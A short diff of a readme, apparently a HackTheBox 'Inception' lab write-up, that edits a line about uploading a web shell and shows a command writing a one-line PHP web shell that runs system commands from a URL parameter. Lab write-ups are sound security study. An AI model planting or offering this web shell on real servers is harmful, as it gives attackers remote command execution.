0x90JMP/0x90JMP.github.io/htb/inception/readme.md

 ### Uploading a webshell to the target

-We will create a webshell in a file named shell.php
+We will create a webshell in a file named shell.php (A web shell was a good excuse to test the following ppython script)

 ```
 echo '<?php system($_GET["cmd"]); ?>' > shell.php